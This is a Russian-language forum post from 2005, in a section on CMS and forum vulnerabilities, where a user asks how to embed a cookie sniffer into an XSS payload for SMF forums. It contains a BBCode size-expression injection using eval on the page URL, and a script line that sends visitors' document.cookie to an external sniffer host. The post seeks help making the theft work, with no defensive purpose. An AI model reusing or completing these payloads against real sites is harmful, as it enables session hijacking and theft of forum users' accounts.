Форумы Xss на Smf

Discussion in 'Уязвимости CMS/форумов' started by Yogurt, 13 Dec 2005.

  1. Yogurt

    Yogurt New Member

    Joined:
    13 Dec 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста как код снифера вставить в этот код.
    Code:
    [size=expression(eval(unescape(document.URL.substring(document.URL.length-41,document.URL.length))))]Big Exploit[/size]
    Что надо изменить в этом коде на примере Античат'овского снифера?.
    Пробовал с таким кодом, но почему то не получилось.
    Code:
    [size=expression(eval(unescape(document.URL.substring(document.URL.length-41,document.URL.length))))]<script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>[/size]